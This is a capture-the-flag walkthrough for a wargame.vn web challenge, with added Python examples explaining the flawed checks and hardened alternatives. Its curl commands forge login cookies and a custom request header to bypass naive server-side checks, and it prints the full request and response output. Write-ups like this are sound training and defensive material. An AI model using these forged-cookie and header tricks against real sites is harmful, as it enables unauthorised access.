We view the page source:
view-source:http://challenges.wargame.vn:1337/web100_d6da263d82cd07bd02cecf82f2b666b7/
=>> <!-- next: level2.php --> at line 200
Level2: http://challenges.wargame.vn:1337/web100_d6da263d82cd07bd02cecf82f2b666b7/level2.php
We inspect the HTTP headers with Live HTTP Headers:
http://challenges.wargame.vn:1337/web100_d6da263d82cd07bd02cecf82f2b666b7/level2.php
GET /web100_d6da263d82cd07bd02cecf82f2b666b7/level2.php HTTP/1.1
Host: challenges.wargame.vn:1337
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20100101 Firefox/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: vi-vn,vi;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
HTTP/1.1 200 OK
Date: Wed, 31 Jul 2013 18:45:18 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.4.6-1ubuntu1.3
Set-Cookie: login=0; expires=Thu, 01-Jan-1970 00:00:01 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 41
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
----------------------------------------------------------
Note one very important line in these headers:
Set-Cookie: login=0; expires=Thu, 01-Jan-1970 00:00:01 GMT
This line sets the cookie login=0, which means we are not logged in.
To send the cookie to the server, we can use curl:
$ curl -v --cookie "login=1" http://challenges.wargame.vn:1337/web100_d6da263d82cd07bd02cecf82f2b666b7/level2.php
* About to connect() to challenges.wargame.vn port 1337 (#0)
* Trying 210.211.125.85... connected
> GET /web100_d6da263d82cd07bd02cecf82f2b666b7/level2.php HTTP/1.1
> User-Agent: curl/7.22.0 (x86_64-pc-linux-gnu) libcurl/7.22.0 OpenSSL/1.0.1 zlib/1.2.3.4 libidn/1.23 librtmp/2.3
> Host: challenges.wargame.vn:1337
> Accept: */*
> Cookie: login=1
>
< HTTP/1.1 200 OK
< Date: Wed, 31 Jul 2013 18:49:44 GMT
< Server: Apache/2.2.22 (Ubuntu)
< X-Powered-By: PHP/5.4.6-1ubuntu1.3
< Vary: Accept-Encoding
< Content-Length: 33
< Content-Type: text/html
<
* Connection #0 to host challenges.wargame.vn left intact
* Closing connection #0
<h1>Ops!</h1><!-- l3v3l_3.php -->
So the link to level 3 is: l3v3l_3.php
Level3: http://challenges.wargame.vn:1337/web100_d6da263d82cd07bd02cecf82f2b666b7/l3v3l_3.php
We use Live HTTP Headers to capture the headers:
GET /web100_d6da263d82cd07bd02cecf82f2b666b7/l3v3l_3.php HTTP/1.1
Host: challenges.wargame.vn:1337
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20100101 Firefox/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: vi-vn,vi;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
HTTP/1.1 200 OK
Date: Wed, 31 Jul 2013 18:53:27 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.4.6-1ubuntu1.3
Set-Cookie: login=116.118.9.165; expires=Thu, 01-Jan-1970 00:00:01 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 58
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Again we see the line: Set-Cookie: login=11x.118.xxx.xxx; expires=Thu, 01-Jan-1970 00:00:01 GMT
But this time the value is the IP address of our machine.
In addition, viewing the source gives us a hint: <!-- 127.0.0.1 -->
So the IP in the login cookie must be 127.0.0.1.
We use curl again to send the cookie:
$ curl --cookie "login=127.0.0.1" 'challenges.wargame.vn:1337/web100_d6da263d82cd07bd02cecf82f2b666b7/l3v3l_3.php'
<!-- 127.0.0.1 -->
<h1>Ops!</h1><!-- l3v3l___4.php -->
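
Why levels 2 and 3 fall to a single curl flag, modelled server-side as an added example (not part of the original write-up and not the challenge's code): the naive checks trust the cookie value, while the hardened ones verify a server-issued HMAC tag and read the peer address from the connection. The function names, the "session" cookie and the demo key are assumptions made for this sketch.

```python
import hashlib
import hmac

# Constructed demo key; a real server loads a random secret from its own config.
SECRET = b"constructed-demo-key"

def naive_level2(cookies):
    """Level 2 style check: trusts whatever 'login' value the client sends."""
    return cookies.get("login") == "1"

def naive_level3(cookies):
    """Level 3 style check: trusts an IP address stored in the cookie."""
    return cookies.get("login") == "127.0.0.1"

def tag_for(user):
    """HMAC-SHA256 tag that only the holder of SECRET can compute."""
    return hmac.new(SECRET, user.encode(), hashlib.sha256).hexdigest()

def issue_session(user):
    """Hardened: the cookie value is 'user.tag' with tag = tag_for(user)."""
    return f"{user}.{tag_for(user)}"

def verify_session(cookies):
    """Return the user name only if the tag matches, otherwise None."""
    user, sep, tag = cookies.get("session", "").rpartition(".")
    if not sep or not user:
        return None
    ok = hmac.compare_digest(tag.encode(), tag_for(user).encode())
    return user if ok else None

def is_local_request(environ):
    """Hardened locality check: socket peer address, never a cookie value.
    Assumption: no reverse proxy in front, otherwise REMOTE_ADDR is the
    proxy's address."""
    return environ.get("REMOTE_ADDR") in ("127.0.0.1", "::1")

if __name__ == "__main__":
    print(naive_level2({"login": "1"}))                # forged cookie accepted
    print(naive_level3({"login": "127.0.0.1"}))        # forged cookie accepted
    print(verify_session({"session": "admin.0000"}))   # forged tag rejected
    print(verify_session({"session": issue_session("admin")}))
    print(is_local_request({"REMOTE_ADDR": "116.118.9.165"}))
```
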
Level4: http://challenges.wargame.vn:1337/web100_d6da263d82cd07bd02cecf82f2b666b7/l3v3l___4.php
We view its source:
<!-- if($_SERVER['HTTP_1337']=='1337') -->
Array
(
[HTTP_HOST] => challenges.wargame.vn:1337
[HTTP_USER_AGENT] => Mozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20100101 Firefox/22.0
[HTTP_ACCEPT] => text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
[HTTP_ACCEPT_LANGUAGE] => vi-vn,vi;q=0.8,en-us;q=0.5,en;q=0.3
[HTTP_ACCEPT_ENCODING] => gzip, deflate
[HTTP_DNT] => 1
[HTTP_CONNECTION] => keep-alive
[PATH] => /usr/local/bin:/usr/bin:/bin
[SERVER_SIGNATURE] => <address>Apache/2.2.22 (Ubuntu)
Server at challenges.wargame.vn Port 1337</address>
[SERVER_SOFTWARE] => Apache/2.2.22 (Ubuntu)
[SERVER_NAME] => challenges.wargame.vn
[SERVER_ADDR] => 210.211.125.85
[SERVER_PORT] => 1337
[REMOTE_ADDR] => 116.118.9.165
[DOCUMENT_ROOT] => /var/www2
[SERVER_ADMIN] => webmaster@localhost
[SCRIPT_FILENAME] => /var/www2/web100_d6da263d82cd07bd02cecf82f2b666b7/l3v3l___4.php
[REMOTE_PORT] => 1939
[GATEWAY_INTERFACE] => CGI/1.1
[SERVER_PROTOCOL] => HTTP/1.1
[REQUEST_METHOD] => GET
[QUERY_STRING] =>
[REQUEST_URI] => /web100_d6da263d82cd07bd02cecf82f2b666b7/l3v3l___4.php
[SCRIPT_NAME] => /web100_d6da263d82cd07bd02cecf82f2b666b7/l3v3l___4.php
[PHP_SELF] => /web100_d6da263d82cd07bd02cecf82f2b666b7/l3v3l___4.php
[REQUEST_TIME_FLOAT] => 1375297124.212
[REQUEST_TIME] => 1375297124
)
The hint here is: <!-- if($_SERVER['HTTP_1337']=='1337') -->
This hint leads us to search Google for $_SERVER, where we find:
<?php
$_SERVER['HTTP_X_DEBUG_CUSTOM']; // "some string"
?>
Here X_DEBUG_CUSTOM is an arbitrary string. We send the header with curl:
$ curl --header "1337:1337" http://challenges.wargame.vn:1337/web100_d6da263d82cd07bd02cecf82f2b666b7/l3v3l___4.php
<!-- if($_SERVER['HTTP_1337']=='1337') -->
Array
(
[HTTP_USER_AGENT] => curl/7.22.0 (x86_64-pc-linux-gnu) libcurl/7.22.0 OpenSSL/1.0.1 zlib/1.2.3.4 libidn/1.23 librtmp/2.3
[HTTP_HOST] => challenges.wargame.vn:1337
[HTTP_ACCEPT] => */*
[HTTP_1337] => 1337
[PATH] => /usr/local/bin:/usr/bin:/bin
[SERVER_SIGNATURE] => <address>Apache/2.2.22 (Ubuntu) Server at challenges.wargame.vn Port 1337</address>
[SERVER_SOFTWARE] => Apache/2.2.22 (Ubuntu)
[SERVER_NAME] => challenges.wargame.vn
[SERVER_ADDR] => 210.211.125.85
[SERVER_PORT] => 1337
[REMOTE_ADDR] => 54.225.164.184
[DOCUMENT_ROOT] => /var/www2
[SERVER_ADMIN] => webmaster@localhost
[SCRIPT_FILENAME] => /var/www2/web100_d6da263d82cd07bd02cecf82f2b666b7/l3v3l___4.php
[REMOTE_PORT] => 35575
[GATEWAY_INTERFACE] => CGI/1.1
[SERVER_PROTOCOL] => HTTP/1.1
[REQUEST_METHOD] => GET
[QUERY_STRING] =>
[REQUEST_URI] => /web100_d6da263d82cd07bd02cecf82f2b666b7/l3v3l___4.php
[SCRIPT_NAME] => /web100_d6da263d82cd07bd02cecf82f2b666b7/l3v3l___4.php
[PHP_SELF] => /web100_d6da263d82cd07bd02cecf82f2b666b7/l3v3l___4.php
[REQUEST_TIME_FLOAT] => 1375297550.608
[REQUEST_TIME] => 1375297550
)
<h1>Ops!</h1><!-- level_$5.php --> 
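
How the "1337:1337" request header ends up as $_SERVER['HTTP_1337'], as an added example (a Python model, not the challenge's PHP and not code from the original write-up): it applies the CGI naming rule from RFC 3875 to a constructed request and separates the keys copied from headers from the one taken from the TCP connection. The function names, the shortened path and the peer address 203.0.113.7 are assumptions.

```python
def cgi_name(header_name):
    """RFC 3875 rule: upper-case the name, turn '-' into '_', prefix 'HTTP_'."""
    return "HTTP_" + header_name.upper().replace("-", "_")

def build_environ(raw_request, peer_addr, peer_port):
    """Model of how a CGI-style server fills the array PHP exposes as $_SERVER."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, uri, protocol = request_line.split(" ", 2)
    environ = {
        "REQUEST_METHOD": method,
        "REQUEST_URI": uri,
        "SERVER_PROTOCOL": protocol,
        # Taken from the TCP connection, not from anything the client typed.
        "REMOTE_ADDR": peer_addr,
        "REMOTE_PORT": str(peer_port),
    }
    for line in header_lines:
        name, _, value = line.partition(":")
        environ[cgi_name(name.strip())] = value.strip()
    return environ

def header_derived_keys(environ):
    """Keys copied from request headers: the sender chooses name and value."""
    return sorted(k for k in environ if k.startswith("HTTP_"))

# Constructed request modelled on the curl call above (path shortened).
SAMPLE_REQUEST = (
    "GET /l3v3l___4.php HTTP/1.1\r\n"
    "User-Agent: curl/7.22.0\r\n"
    "Host: challenges.wargame.vn:1337\r\n"
    "Accept: */*\r\n"
    "1337:1337\r\n"
    "\r\n"
)

if __name__ == "__main__":
    env = build_environ(SAMPLE_REQUEST, "203.0.113.7", 35575)
    for key in header_derived_keys(env):
        print(key, "=>", env[key])
    # 'X-Debug-Custom' and 'X_Debug_Custom' collapse to the same key.
    print(cgi_name("X-Debug-Custom") == cgi_name("X_Debug_Custom"))
```

Every HTTP_* entry is sender-supplied text, so a comparison such as the one in the hint can only ever act as a puzzle, not as an access check.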